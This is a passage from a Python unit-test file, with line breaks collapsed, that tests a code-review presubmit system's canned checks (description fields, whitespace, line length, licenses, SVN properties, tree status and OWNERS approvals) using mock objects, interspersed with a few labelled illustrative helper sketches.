None, 0, 0, None) input_api1 = self.MockInputApi(change1, False) affected_file1 = self.mox.CreateMock(presubmit.SvnAffectedFile) input_api1.AffectedSourceFiles(None).AndReturn([affected_file1]) input_api1.ReadFile(affected_file1, 'rb').AndReturn(content1) change2 = presubmit.Change( 'foo2', 'foo2\n', self.fake_root_dir, None, 0, 0, None) input_api2 = self.MockInputApi(change2, False) affected_file2 = self.mox.CreateMock(presubmit.SvnAffectedFile) input_api2.AffectedSourceFiles(None).AndReturn([affected_file2]) input_api2.ReadFile(affected_file2, 'rb').AndReturn(content2) affected_file2.LocalPath().AndReturn('bar.cc') self.mox.ReplayAll() results = check(input_api1, presubmit.OutputApi) self.assertEquals(results, []) results2 = check(input_api2, presubmit.OutputApi) self.assertEquals(len(results2), 1) self.assertEquals(results2[0].__class__, error_type) def SvnPropertyTest(self, check, property_name, value1, value2, committing, error_type, use_source_file): change1 = presubmit.SvnChange( 'mychange', '', self.fake_root_dir, [], 0, 0, None) input_api1 = self.MockInputApi(change1, committing) files1 = [ presubmit.SvnAffectedFile('foo/bar.cc', 'A', self.fake_root_dir, None), presubmit.SvnAffectedFile('foo.cc', 'M', self.fake_root_dir, None), ] if use_source_file: input_api1.AffectedSourceFiles(None).AndReturn(files1) else: input_api1.AffectedFiles(include_deletes=False).AndReturn(files1) presubmit.scm.SVN.GetFileProperty( presubmit.normpath('foo/bar.cc'), property_name, self.fake_root_dir ).AndReturn(value1) presubmit.scm.SVN.GetFileProperty( presubmit.normpath('foo.cc'), property_name, self.fake_root_dir ).AndReturn(value1) change2 = presubmit.SvnChange( 'mychange', '', self.fake_root_dir, [], 0, 0, None) input_api2 = self.MockInputApi(change2, committing) files2 = [ presubmit.SvnAffectedFile('foo/bar.cc', 'A', self.fake_root_dir, None), presubmit.SvnAffectedFile('foo.cc', 'M', self.fake_root_dir, None), ] if use_source_file: input_api2.AffectedSourceFiles(None).AndReturn(files2) else: 
input_api2.AffectedFiles(include_deletes=False).AndReturn(files2) presubmit.scm.SVN.GetFileProperty( presubmit.normpath('foo/bar.cc'), property_name, self.fake_root_dir ).AndReturn(value2) presubmit.scm.SVN.GetFileProperty( presubmit.normpath('foo.cc'), property_name, self.fake_root_dir ).AndReturn(value2) self.mox.ReplayAll() results1 = check(input_api1, presubmit.OutputApi, None) self.assertEquals(results1, []) results2 = check(input_api2, presubmit.OutputApi, None) self.assertEquals(len(results2), 1) self.assertEquals(results2[0].__class__, error_type) def testCannedCheckChangeHasBugField(self): self.DescriptionTest(presubmit_canned_checks.CheckChangeHasBugField, 'Foo\nBUG=1234', 'Foo\n', presubmit.OutputApi.PresubmitNotifyResult, False) def testCheckChangeHasDescription(self): self.DescriptionTest(presubmit_canned_checks.CheckChangeHasDescription, 'Bleh', '', presubmit.OutputApi.PresubmitNotifyResult, False) self.mox.VerifyAll() self.DescriptionTest(presubmit_canned_checks.CheckChangeHasDescription, 'Bleh', '', presubmit.OutputApi.PresubmitError, True) def testCannedCheckChangeHasTestField(self): self.DescriptionTest(presubmit_canned_checks.CheckChangeHasTestField, 'Foo\nTEST=did some stuff', 'Foo\n', presubmit.OutputApi.PresubmitNotifyResult, False) def testCannedCheckChangeHasTestedField(self): self.DescriptionTest(presubmit_canned_checks.CheckChangeHasTestedField, 'Foo\nTESTED=did some stuff', 'Foo\n', presubmit.OutputApi.PresubmitError, False) def testCannedCheckChangeHasQAField(self): self.DescriptionTest(presubmit_canned_checks.CheckChangeHasQaField, 'Foo\nQA=BSOD your machine', 'Foo\n', presubmit.OutputApi.PresubmitError, False) def testCannedCheckDoNotSubmitInDescription(self): self.DescriptionTest(presubmit_canned_checks.CheckDoNotSubmitInDescription, 'Foo\nDO NOTSUBMIT', 'Foo\nDO NOT ' + 'SUBMIT', presubmit.OutputApi.PresubmitError, False) def testCannedCheckDoNotSubmitInFiles(self): self.ContentTest( lambda x,y,z: presubmit_canned_checks.CheckDoNotSubmitInFiles(x, y), 'DO NOTSUBMIT', None, 'DO NOT ' + 'SUBMIT', None, presubmit.OutputApi.PresubmitError) def testCheckChangeHasNoStrayWhitespace(self): self.ContentTest( lambda x,y,z: presubmit_canned_checks.CheckChangeHasNoStrayWhitespace(x, y), 'Foo', None, 'Foo ', None, presubmit.OutputApi.PresubmitPromptWarning) def testCheckChangeHasOnlyOneEol(self): self.ReadFileTest(presubmit_canned_checks.CheckChangeHasOnlyOneEol, "Hey!\nHo!\n", "Hey!\nHo!\n\n", presubmit.OutputApi.PresubmitPromptWarning) def testCheckChangeHasNoCR(self): self.ReadFileTest(presubmit_canned_checks.CheckChangeHasNoCR, "Hey!\nHo!\n", "Hey!\r\nHo!\r\n", presubmit.OutputApi.PresubmitPromptWarning) def testCheckChangeHasNoCrAndHasOnlyOneEol(self): self.ReadFileTest( presubmit_canned_checks.CheckChangeHasNoCrAndHasOnlyOneEol, "Hey!\nHo!\n", "Hey!\nHo!\n\n", presubmit.OutputApi.PresubmitPromptWarning) self.mox.VerifyAll() self.ReadFileTest( presubmit_canned_checks.CheckChangeHasNoCrAndHasOnlyOneEol, "Hey!\nHo!\n", "Hey!\r\nHo!\r\n", presubmit.OutputApi.PresubmitPromptWarning) def testCheckChangeTodoHasOwner(self): self.ContentTest(presubmit_canned_checks.CheckChangeTodoHasOwner, "TODO(foo): bar", None, "TODO: bar", None, presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckChangeHasNoTabs(self): self.ContentTest(presubmit_canned_checks.CheckChangeHasNoTabs, 'blah blah', None, 'blah\tblah', None, presubmit.OutputApi.PresubmitPromptWarning) # Make sure makefiles are ignored. 
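# -----------------------------------------------------------------------------
# Illustrative sketch, not the real presubmit_canned_checks implementation:
# the general shape of the description checks driven by DescriptionTest above
# (e.g. CheckChangeHasBugField) - a check inspects the change description and
# returns a possibly empty list of findings.  This stand-in works on a plain
# string instead of an InputApi; the helper name is hypothetical.
def _example_check_has_bug_field(description):
  """Return [] if a BUG= line is present, else a single warning string."""
  if any(line.startswith('BUG=') for line in description.splitlines()):
    return []
  return ['If this change has an associated bug, add BUG=[bug number].']

assert _example_check_has_bug_field('Foo\nBUG=1234') == []
assert len(_example_check_has_bug_field('Foo\n')) == 1
# -----------------------------------------------------------------------------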
change1 = presubmit.Change( 'foo1', 'foo1\n', self.fake_root_dir, None, 0, 0, None) input_api1 = self.MockInputApi(change1, False) affected_file1 = self.mox.CreateMock(presubmit.SvnAffectedFile) affected_file1.LocalPath().AndReturn('foo.cc') affected_file2 = self.mox.CreateMock(presubmit.SvnAffectedFile) affected_file2.LocalPath().AndReturn('foo/Makefile') affected_file3 = self.mox.CreateMock(presubmit.SvnAffectedFile) affected_file3.LocalPath().AndReturn('makefile') # Only this one will trigger. affected_file4 = self.mox.CreateMock(presubmit.SvnAffectedFile) affected_file1.LocalPath().AndReturn('foo.cc') affected_file1.NewContents().AndReturn(['yo, ']) affected_file4.LocalPath().AndReturn('makefile.foo') affected_file4.LocalPath().AndReturn('makefile.foo') affected_file4.NewContents().AndReturn(['ye\t']) affected_file4.ChangedContents().AndReturn([(46, 'ye\t')]) affected_file4.LocalPath().AndReturn('makefile.foo') affected_files = (affected_file1, affected_file2, affected_file3, affected_file4) def test(include_dirs=False, include_deletes=True, file_filter=None): self.assertFalse(include_deletes) for x in affected_files: if file_filter(x): yield x # Override the mock of these functions. input_api1.FilterSourceFile = lambda x: x input_api1.AffectedFiles = test self.mox.ReplayAll() results1 = presubmit_canned_checks.CheckChangeHasNoTabs(input_api1, presubmit.OutputApi, None) self.assertEquals(len(results1), 1) self.assertEquals(results1[0].__class__, presubmit.OutputApi.PresubmitPromptWarning) self.assertEquals(results1[0]._long_text, 'makefile.foo:46') def testCannedCheckLongLines(self): check = lambda x, y, z: presubmit_canned_checks.CheckLongLines(x, y, 10, z) self.ContentTest(check, '0123456789', None, '01234567890', None, presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckJavaLongLines(self): check = lambda x, y, _: presubmit_canned_checks.CheckLongLines(x, y, 80) self.ContentTest(check, 'A ' * 50, 'foo.java', 'A ' * 50 + 'B', 'foo.java', presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckSpecialJavaLongLines(self): check = lambda x, y, _: presubmit_canned_checks.CheckLongLines(x, y, 80) self.ContentTest(check, 'import ' + 'A ' * 150, 'foo.java', 'importSomething ' + 'A ' * 50, 'foo.java', presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckObjCExceptionLongLines(self): check = lambda x, y, _: presubmit_canned_checks.CheckLongLines(x, y, 80) self.ContentTest(check, '#import ' + 'A ' * 150, 'foo.mm', 'import' + 'A ' * 150, 'foo.mm', presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckMakefileLongLines(self): check = lambda x, y, _: presubmit_canned_checks.CheckLongLines(x, y, 80) self.ContentTest(check, 'A ' * 100, 'foo.mk', 'A ' * 100 + 'B', 'foo.mk', presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckLongLinesLF(self): check = lambda x, y, z: presubmit_canned_checks.CheckLongLines(x, y, 10, z) self.ContentTest(check, '012345678\n', None, '0123456789\n', None, presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckCppExceptionLongLines(self): check = lambda x, y, z: presubmit_canned_checks.CheckLongLines(x, y, 10, z) self.ContentTest( check, '#if 56 89 12 45 9191919191919', 'foo.cc', '#nif 56 89 12 45 9191919191919', 'foo.cc', presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckLongLinesHttp(self): check = lambda x, y, z: presubmit_canned_checks.CheckLongLines(x, y, 10, z) self.ContentTest( check, ' http:// 0 23 56', None, ' foob:// 0 23 56', None, presubmit.OutputApi.PresubmitPromptWarning) def 
testCannedCheckLongLinesFile(self): check = lambda x, y, z: presubmit_canned_checks.CheckLongLines(x, y, 10, z) self.ContentTest( check, ' file:// 0 23 56', None, ' foob:// 0 23 56', None, presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckLongLinesCssUrl(self): check = lambda x, y, z: presubmit_canned_checks.CheckLongLines(x, y, 10, z) self.ContentTest( check, ' url(some.png)', 'foo.css', ' url(some.png)', 'foo.cc', presubmit.OutputApi.PresubmitPromptWarning) def testCannedCheckLongLinesLongSymbol(self): check = lambda x, y, z: presubmit_canned_checks.CheckLongLines(x, y, 10, z) self.ContentTest( check, ' TUP5D_LoNG_SY ', None, ' TUP5D_LoNG_SY5 ', None, presubmit.OutputApi.PresubmitPromptWarning) def testCheckChangeSvnEolStyleCommit(self): # Test CheckSvnProperty at the same time. self.SvnPropertyTest(presubmit_canned_checks.CheckChangeSvnEolStyle, 'svn:eol-style', 'LF', '', True, presubmit.OutputApi.PresubmitError, True) def testCheckChangeSvnEolStyleUpload(self): self.SvnPropertyTest(presubmit_canned_checks.CheckChangeSvnEolStyle, 'svn:eol-style', 'LF', '', False, presubmit.OutputApi.PresubmitNotifyResult, True) def _LicenseCheck(self, text, license_text, committing, expected_result, **kwargs): change = self.mox.CreateMock(presubmit.SvnChange) change.scm = 'svn' input_api = self.MockInputApi(change, committing) affected_file = self.mox.CreateMock(presubmit.SvnAffectedFile) input_api.AffectedSourceFiles(42).AndReturn([affected_file]) input_api.ReadFile(affected_file, 'rb').AndReturn(text) if expected_result: affected_file.LocalPath().AndReturn('bleh') self.mox.ReplayAll() result = presubmit_canned_checks.CheckLicense( input_api, presubmit.OutputApi, license_text, source_file_filter=42, **kwargs) if expected_result: self.assertEqual(len(result), 1) self.assertEqual(result[0].__class__, expected_result) else: self.assertEqual(result, []) def testCheckLicenseSuccess(self): text = ( "#!/bin/python\n" "# Copyright (c) 2037 Nobody.\n" "# All Rights Reserved.\n" "print 'foo'\n" ) license_text = ( r".*? Copyright \(c\) 2037 Nobody." "\n" r".*? All Rights Reserved\." "\n" ) self._LicenseCheck(text, license_text, True, None) def testCheckLicenseFailCommit(self): text = ( "#!/bin/python\n" "# Copyright (c) 2037 Nobody.\n" "# All Rights Reserved.\n" "print 'foo'\n" ) license_text = ( r".*? Copyright \(c\) 0007 Nobody." "\n" r".*? All Rights Reserved\." "\n" ) self._LicenseCheck(text, license_text, True, presubmit.OutputApi.PresubmitPromptWarning) def testCheckLicenseFailUpload(self): text = ( "#!/bin/python\n" "# Copyright (c) 2037 Nobody.\n" "# All Rights Reserved.\n" "print 'foo'\n" ) license_text = ( r".*? Copyright \(c\) 0007 Nobody." "\n" r".*? All Rights Reserved\." "\n" ) self._LicenseCheck(text, license_text, False, presubmit.OutputApi.PresubmitNotifyResult) def testCheckLicenseEmptySuccess(self): text = '' license_text = ( r".*? Copyright \(c\) 2037 Nobody." "\n" r".*? All Rights Reserved\." 
"\n" ) self._LicenseCheck(text, license_text, True, None, accept_empty_files=True) def testCannedCheckSvnAccidentalSubmission(self): modified_dir_file = 'foo/' accidental_submssion_file = 'foo/bar.cc' change = self.mox.CreateMock(presubmit.SvnChange) change.scm = 'svn' change.GetModifiedFiles().AndReturn([modified_dir_file]) change.GetAllModifiedFiles().AndReturn([modified_dir_file, accidental_submssion_file]) input_api = self.MockInputApi(change, True) affected_file = self.mox.CreateMock(presubmit.SvnAffectedFile) affected_file.Action().AndReturn('M') affected_file.IsDirectory().AndReturn(True) affected_file.AbsoluteLocalPath().AndReturn(accidental_submssion_file) affected_file.LocalPath().AndReturn(accidental_submssion_file) input_api.AffectedFiles(file_filter=None).AndReturn([affected_file]) self.mox.ReplayAll() check = presubmit_canned_checks.CheckSvnModifiedDirectories results = check(input_api, presubmit.OutputApi, None) self.assertEquals(len(results), 1) self.assertEquals(results[0].__class__, presubmit.OutputApi.PresubmitPromptWarning) def testCheckSvnForCommonMimeTypes(self): self.mox.StubOutWithMock(presubmit_canned_checks, 'CheckSvnProperty') input_api = self.MockInputApi(None, False) output_api = presubmit.OutputApi(False) A = lambda x: presubmit.AffectedFile(x, 'M', self.fake_root_dir, None) files = [ A('a.pdf'), A('b.bmp'), A('c.gif'), A('d.png'), A('e.jpg'), A('f.jpe'), A('random'), A('g.jpeg'), A('h.ico'), ] input_api.AffectedFiles(include_deletes=False).AndReturn(files) presubmit_canned_checks.CheckSvnProperty( input_api, output_api, 'svn:mime-type', 'application/pdf', [files[0]] ).AndReturn([1]) presubmit_canned_checks.CheckSvnProperty( input_api, output_api, 'svn:mime-type', 'image/bmp', [files[1]] ).AndReturn([2]) presubmit_canned_checks.CheckSvnProperty( input_api, output_api, 'svn:mime-type', 'image/gif', [files[2]] ).AndReturn([3]) presubmit_canned_checks.CheckSvnProperty( input_api, output_api, 'svn:mime-type', 'image/png', [files[3]] ).AndReturn([4]) presubmit_canned_checks.CheckSvnProperty( input_api, output_api, 'svn:mime-type', 'image/jpeg', [files[4], files[5], files[7]] ).AndReturn([5]) presubmit_canned_checks.CheckSvnProperty( input_api, output_api, 'svn:mime-type', 'image/vnd.microsoft.icon', [files[8]]).AndReturn([6]) self.mox.ReplayAll() results = presubmit_canned_checks.CheckSvnForCommonMimeTypes( input_api, output_api) self.assertEquals(results, [1, 2, 3, 4, 5, 6]) def testCannedCheckTreeIsOpenOpen(self): input_api = self.MockInputApi(None, True) connection = self.mox.CreateMockAnything() input_api.urllib2.urlopen('url_to_open').AndReturn(connection) connection.read().AndReturn('The tree is open') connection.close() self.mox.ReplayAll() results = presubmit_canned_checks.CheckTreeIsOpen( input_api, presubmit.OutputApi, url='url_to_open', closed='.*closed.*') self.assertEquals(results, []) def testCannedCheckTreeIsOpenClosed(self): input_api = self.MockInputApi(None, True) connection = self.mox.CreateMockAnything() input_api.urllib2.urlopen('url_to_closed').AndReturn(connection) connection.read().AndReturn('Tree is closed for maintenance') connection.close() self.mox.ReplayAll() results = presubmit_canned_checks.CheckTreeIsOpen( input_api, presubmit.OutputApi, url='url_to_closed', closed='.*closed.*') self.assertEquals(len(results), 1) self.assertEquals(results[0].__class__, presubmit.OutputApi.PresubmitError) def testCannedCheckJsonTreeIsOpenOpen(self): input_api = self.MockInputApi(None, True) connection = self.mox.CreateMockAnything() 
input_api.urllib2.urlopen('url_to_open').AndReturn(connection) status = { 'can_commit_freely': True, 'general_state': 'open', 'message': 'The tree is open' } connection.read().AndReturn(input_api.json.dumps(status)) connection.close() self.mox.ReplayAll() results = presubmit_canned_checks.CheckTreeIsOpen( input_api, presubmit.OutputApi, json_url='url_to_open') self.assertEquals(results, []) def testCannedCheckJsonTreeIsOpenClosed(self): input_api = self.MockInputApi(None, True) connection = self.mox.CreateMockAnything() input_api.urllib2.urlopen('url_to_closed').AndReturn(connection) status = { 'can_commit_freely': False, 'general_state': 'closed', 'message': 'The tree is close', } connection.read().AndReturn(input_api.json.dumps(status)) connection.close() self.mox.ReplayAll() results = presubmit_canned_checks.CheckTreeIsOpen( input_api, presubmit.OutputApi, json_url='url_to_closed') self.assertEquals(len(results), 1) self.assertEquals(results[0].__class__, presubmit.OutputApi.PresubmitError) def testRunPythonUnitTestsNoTest(self): input_api = self.MockInputApi(None, False) self.mox.ReplayAll() results = presubmit_canned_checks.RunPythonUnitTests( input_api, presubmit.OutputApi, []) self.assertEquals(results, []) def testRunPythonUnitTestsNonExistentUpload(self): input_api = self.MockInputApi(None, False) CommHelper(input_api, ['pyyyyython', '-m', '_non_existent_module'], ret=(('foo', None), 1), cwd=None, env=None) self.mox.ReplayAll() results = presubmit_canned_checks.RunPythonUnitTests( input_api, presubmit.OutputApi, ['_non_existent_module']) self.assertEquals(len(results), 1) self.assertEquals(results[0].__class__, presubmit.OutputApi.PresubmitNotifyResult) def testRunPythonUnitTestsNonExistentCommitting(self): input_api = self.MockInputApi(None, True) CommHelper(input_api, ['pyyyyython', '-m', '_non_existent_module'], ret=(('foo', None), 1), cwd=None, env=None) self.mox.ReplayAll() results = presubmit_canned_checks.RunPythonUnitTests( input_api, presubmit.OutputApi, ['_non_existent_module']) self.assertEquals(len(results), 1) self.assertEquals(results[0].__class__, presubmit.OutputApi.PresubmitError) def testRunPythonUnitTestsFailureUpload(self): input_api = self.MockInputApi(None, False) input_api.unittest = self.mox.CreateMock(unittest) input_api.cStringIO = self.mox.CreateMock(presubmit.cStringIO) CommHelper(input_api, ['pyyyyython', '-m', 'test_module'], ret=(('foo', None), 1), cwd=None, env=None) self.mox.ReplayAll() results = presubmit_canned_checks.RunPythonUnitTests( input_api, presubmit.OutputApi, ['test_module']) self.assertEquals(len(results), 1) self.assertEquals(results[0].__class__, presubmit.OutputApi.PresubmitNotifyResult) self.assertEquals('test_module (0.00s) failed\nfoo', results[0]._message) def testRunPythonUnitTestsFailureCommitting(self): input_api = self.MockInputApi(None, True) CommHelper(input_api, ['pyyyyython', '-m', 'test_module'], ret=(('foo', None), 1), cwd=None, env=None) self.mox.ReplayAll() results = presubmit_canned_checks.RunPythonUnitTests( input_api, presubmit.OutputApi, ['test_module']) self.assertEquals(len(results), 1) self.assertEquals(results[0].__class__, presubmit.OutputApi.PresubmitError) self.assertEquals('test_module (0.00s) failed\nfoo', results[0]._message) def testRunPythonUnitTestsSuccess(self): input_api = self.MockInputApi(None, False) input_api.cStringIO = self.mox.CreateMock(presubmit.cStringIO) input_api.unittest = self.mox.CreateMock(unittest) CommHelper(input_api, ['pyyyyython', '-m', 'test_module'], cwd=None, env=None) 
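# -----------------------------------------------------------------------------
# Illustrative sketches, not the real canned checks: (1) the extension to
# svn:mime-type grouping expected by testCheckSvnForCommonMimeTypes above,
# with .jpg/.jpe/.jpeg collapsing onto image/jpeg, and (2) how the JSON tree
# status used by testCannedCheckJsonTreeIsOpenOpen/Closed can be interpreted.
# The tables and helper names are assumptions made for illustration only.
import json
import os

_EXAMPLE_MIME_TYPES = {
    '.pdf': 'application/pdf',
    '.bmp': 'image/bmp',
    '.gif': 'image/gif',
    '.png': 'image/png',
    '.jpg': 'image/jpeg',
    '.jpe': 'image/jpeg',
    '.jpeg': 'image/jpeg',
    '.ico': 'image/vnd.microsoft.icon',
}

def _example_group_by_mime_type(paths):
  """Return {mime_type: [paths]} for paths whose extension is known."""
  grouped = {}
  for path in paths:
    mime_type = _EXAMPLE_MIME_TYPES.get(os.path.splitext(path)[1].lower())
    if mime_type:
      grouped.setdefault(mime_type, []).append(path)
  return grouped

assert _example_group_by_mime_type(['a.pdf', 'e.jpg', 'f.jpe', 'random']) == {
    'application/pdf': ['a.pdf'], 'image/jpeg': ['e.jpg', 'f.jpe']}

def _example_tree_is_open(status_json):
  """Return (is_open, message) parsed from a tree status JSON string."""
  status = json.loads(status_json)
  return bool(status.get('can_commit_freely')), status.get('message', '')

assert _example_tree_is_open(
    '{"can_commit_freely": true, "message": "The tree is open"}') == (
        True, 'The tree is open')
assert _example_tree_is_open(
    '{"can_commit_freely": false, "message": "closed for maintenance"}') == (
        False, 'closed for maintenance')
# -----------------------------------------------------------------------------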
self.mox.ReplayAll() results = presubmit_canned_checks.RunPythonUnitTests( input_api, presubmit.OutputApi, ['test_module']) self.assertEquals(len(results), 0) def testCannedRunPylint(self): input_api = self.MockInputApi(None, True) input_api.environ = self.mox.CreateMock(os.environ) input_api.environ.copy().AndReturn({}) input_api.AffectedSourceFiles(mox.IgnoreArg()).AndReturn(True) input_api.PresubmitLocalPath().AndReturn('/foo') input_api.PresubmitLocalPath().AndReturn('/foo') input_api.os_walk('/foo').AndReturn([('/foo', [], ['file1.py'])]) pylint = os.path.join(_ROOT, 'third_party', 'pylint.py') pylintrc = os.path.join(_ROOT, 'pylintrc') CommHelper(input_api, ['pyyyyython', pylint, '--args-on-stdin'], env=mox.IgnoreArg(), stdin= '--rcfile=%s\n--disable=cyclic-import\n--jobs=2\nfile1.py' % pylintrc) CommHelper(input_api, ['pyyyyython', pylint, '--args-on-stdin'], env=mox.IgnoreArg(), stdin= '--rcfile=%s\n--disable=all\n--enable=cyclic-import\nfile1.py' % pylintrc) self.mox.ReplayAll() results = presubmit_canned_checks.RunPylint( input_api, presubmit.OutputApi) self.assertEquals([], results) self.checkstdout('') def testCheckBuildbotPendingBuildsBad(self): input_api = self.MockInputApi(None, True) connection = self.mox.CreateMockAnything() input_api.urllib2.urlopen('uurl').AndReturn(connection) connection.read().AndReturn('foo') connection.close() self.mox.ReplayAll() results = presubmit_canned_checks.CheckBuildbotPendingBuilds( input_api, presubmit.OutputApi, 'uurl', 2, ('foo')) self.assertEquals(len(results), 1) self.assertEquals(results[0].__class__, presubmit.OutputApi.PresubmitNotifyResult) def testCheckBuildbotPendingBuildsGood(self): input_api = self.MockInputApi(None, True) connection = self.mox.CreateMockAnything() input_api.urllib2.urlopen('uurl').AndReturn(connection) connection.read().AndReturn(""" { 'b1': { 'pending_builds': [0, 1, 2, 3, 4, 5, 6, 7] }, 'foo': { 'pending_builds': [0, 1, 2, 3, 4, 5, 6, 7] }, 'b2': { 'pending_builds': [0] } }""") connection.close() self.mox.ReplayAll() results = presubmit_canned_checks.CheckBuildbotPendingBuilds( input_api, presubmit.OutputApi, 'uurl', 2, ('foo')) self.assertEquals(len(results), 1) self.assertEquals(results[0].__class__, presubmit.OutputApi.PresubmitNotifyResult) def AssertOwnersWorks(self, tbr=False, issue='1', approvers=None, reviewers=None, is_committing=True, rietveld_response=None, uncovered_files=None, expected_output='', manually_specified_reviewers=None, cq_dry_run=False): if approvers is None: # The set of people who lgtm'ed a change. approvers = set() if reviewers is None: # The set of people needed to lgtm a change. We default to # the same list as the people who approved it. We use 'reviewers' # to avoid a name collision w/ owners.py. 
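# -----------------------------------------------------------------------------
# Illustrative sketch, not the real CheckOwners: the core approval rule the
# testCannedCheckOwners_* cases below assert on - a change needs an LGTM from
# someone other than its own author.  The helper name and the example e-mail
# addresses are hypothetical.
def _example_missing_lgtm(owner_email, approver_emails):
  """Return True if nobody other than the owner has approved the change."""
  return not (set(approver_emails) - set([owner_email]))

assert _example_missing_lgtm('[email protected]', [])
assert _example_missing_lgtm('[email protected]', ['[email protected]'])
assert not _example_missing_lgtm('[email protected]',
                                 ['[email protected]'])
# -----------------------------------------------------------------------------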
reviewers = approvers if uncovered_files is None: uncovered_files = set() if manually_specified_reviewers is None: manually_specified_reviewers = [] change = self.mox.CreateMock(presubmit.Change) change.issue = issue change.author_email = '[email protected]' change.R = ','.join(manually_specified_reviewers) change.TBR = '' affected_file = self.mox.CreateMock(presubmit.SvnAffectedFile) input_api = self.MockInputApi(change, False) fake_db = self.mox.CreateMock(owners.Database) fake_db.email_regexp = input_api.re.compile(owners.BASIC_EMAIL_REGEXP) input_api.owners_db = fake_db input_api.is_committing = is_committing input_api.tbr = tbr if not is_committing or (not tbr and issue): if not cq_dry_run: affected_file.LocalPath().AndReturn('foo/xyz.cc') change.AffectedFiles(file_filter=None).AndReturn([affected_file]) if issue and not rietveld_response: rietveld_response = { "owner_email": change.author_email, "messages": [ {"sender": a, "text": "I approve", "approval": True} for a in approvers ], "reviewers": reviewers } if is_committing: people = approvers if issue: input_api.rietveld.get_issue_properties( issue=int(input_api.change.issue), messages=None).AndReturn( rietveld_response) else: people = reviewers if not cq_dry_run: if issue: input_api.rietveld.get_issue_properties( issue=int(input_api.change.issue), messages=True).AndReturn( rietveld_response) people.add(change.author_email) fake_db.files_not_covered_by(set(['foo/xyz.cc']), people).AndReturn(uncovered_files) if not is_committing and uncovered_files: fake_db.reviewers_for(set(['foo']), change.author_email).AndReturn(change.author_email) self.mox.ReplayAll() output = presubmit.PresubmitOutput() results = presubmit_canned_checks.CheckOwners(input_api, presubmit.OutputApi) if results: results[0].handle(output) self.assertEquals(output.getvalue(), expected_output) def testCannedCheckOwners_DryRun(self): response = { "owner_email": "[email protected]", "cq_dry_run": True, "reviewers": ["[email protected]"], } self.AssertOwnersWorks(approvers=set(), cq_dry_run=True, rietveld_response=response, reviewers=set(["[email protected]"]), expected_output='This is a CQ dry run, skipping OWNERS check\n') self.AssertOwnersWorks(approvers=set(['[email protected]']), is_committing=False, rietveld_response=response, expected_output='') def testCannedCheckOwners_Approved(self): response = { "owner_email": "[email protected]", "messages": [ { "sender": "[email protected]", "text": "foo", "approval": True, }, ], "reviewers": ["[email protected]"], } self.AssertOwnersWorks(approvers=set(['[email protected]']), rietveld_response=response, expected_output='') self.AssertOwnersWorks(approvers=set(['[email protected]']), is_committing=False, rietveld_response=response, expected_output='') def testCannedCheckOwners_NotApproved(self): response = { "owner_email": "[email protected]", "messages": [ { "sender": "[email protected]", "text": "foo", "approval": False, }, ], "reviewers": ["[email protected]"], } self.AssertOwnersWorks( approvers=set(), reviewers=set(["[email protected]"]), rietveld_response=response, expected_output= 'Missing LGTM from someone other than [email protected]\n') self.AssertOwnersWorks( approvers=set(), reviewers=set(["[email protected]"]), is_committing=False, rietveld_response=response, expected_output='') def testCannedCheckOwners_NoReviewers(self): response = { "owner_email": "[email protected]", "messages": [ { "sender": "[email protected]", "text": "foo", "approval": False, }, ], "reviewers":[], } self.AssertOwnersWorks( 
approvers=set(), reviewers=set(), rietveld_response=response, expected_output= 'Missing LGTM from someone other than [email protected]\n') self.AssertOwnersWorks( approvers=set(), reviewers=set(), is_committing=False, rietveld_response=response, expected_output='') def testCannedCheckOwners_NoIssueNoFiles(self): self.AssertOwnersWorks(issue=None, expected_output="OWNERS check failed: this change has no Rietveld " "issue number, so we can't check it for approvals.\n") self.AssertOwnersWorks(issue=None, is_committing=False, expected_output="") def testCannedCheckOwners_NoIssue(self): self.AssertOwnersWorks(issue=None, uncovered_files=set(['foo']), expected_output="OWNERS check failed: this change has no Rietveld " "issue number, so we can't check it for approvals.\n") self.AssertOwnersWorks(issue=None, is_committing=False, uncovered_files=set(['foo']), expected_output='Missing OWNER reviewers for these files:\n' ' foo\n') def testCannedCheckOwners_NoIssueLocalReviewers(self): self.AssertOwnersWorks(issue=None, reviewers=set(['[email protected]']), manually_specified_reviewers=['[email protected]'], expected_output="OWNERS check failed: this change has no Rietveld " "issue number, so we can't check it for approvals.\n") self.AssertOwnersWorks(issue=None, reviewers=set(['[email protected]']), manually_specified_reviewers=['[email protected]'], is_committing=False, expected_output='') def testCannedCheckOwners_NoIssueLocalReviewersDontInferEmailDomain(self): self.AssertOwnersWorks(issue=None, reviewers=set(['jane']), manually_specified_reviewers=['[email protected]'], expected_output="OWNERS check failed: this change has no Rietveld " "issue number, so we can't check it for approvals.\n") self.AssertOwnersWorks(issue=None, uncovered_files=set(['foo']), manually_specified_reviewers=['jane'], is_committing=False, expected_output='Missing OWNER reviewers for these files:\n' ' foo\n') def testCannedCheckOwners_NoLGTM(self): self.AssertOwnersWorks(expected_output='Missing LGTM from someone ' 'other than [email protected]\n') self.AssertOwnersWorks(is_committing=False, expected_output='') def testCannedCheckOwners_OnlyOwnerLGTM(self): self.AssertOwnersWorks(approvers=set(['[email protected]']), expected_output='Missing LGTM from someone ' 'other than [email protected]\n') self.AssertOwnersWorks(approvers=set(['[email protected]']), is_committing=False, expected_output='') def testCannedCheckOwners_TBR(self): self.AssertOwnersWorks(tbr=True, expected_output='--tbr was specified, skipping OWNERS check\n') self.AssertOwnersWorks(tbr=True, is_committing=False, expected_output='') def testCannedCheckOwners_WithoutOwnerLGTM(self): self.AssertOwnersWorks(uncovered_files=set(['foo']), expected_output='Missing LGTM from an OWNER for these files:\n' ' foo\n') self.AssertOwnersWorks(uncovered_files=set(['foo']), is_committing=False, expected_output='Missing OWNER reviewers for these files:\n' ' foo\n') def testCannedCheckOwners_WithLGTMs(self): self.AssertOwnersWorks(approvers=set(['[email protected]']), uncovered_files=set()) self.AssertOwnersWorks(approvers=set(['[email protected]']), is_committing=False, uncovered_files=set()) def testCannedRunUnitTests(self): change = presubmit.Change( 'foo1', 'description1', self.fake_root_dir, None, 0, 0, None) input_api = self.MockInputApi(change, False) input_api.verbose = True unit_tests = ['allo', 'bar.py'] input_api.PresubmitLocalPath().AndReturn(self.fake_root_dir) input_api.PresubmitLocalPath().AndReturn(self.fake_root_dir) 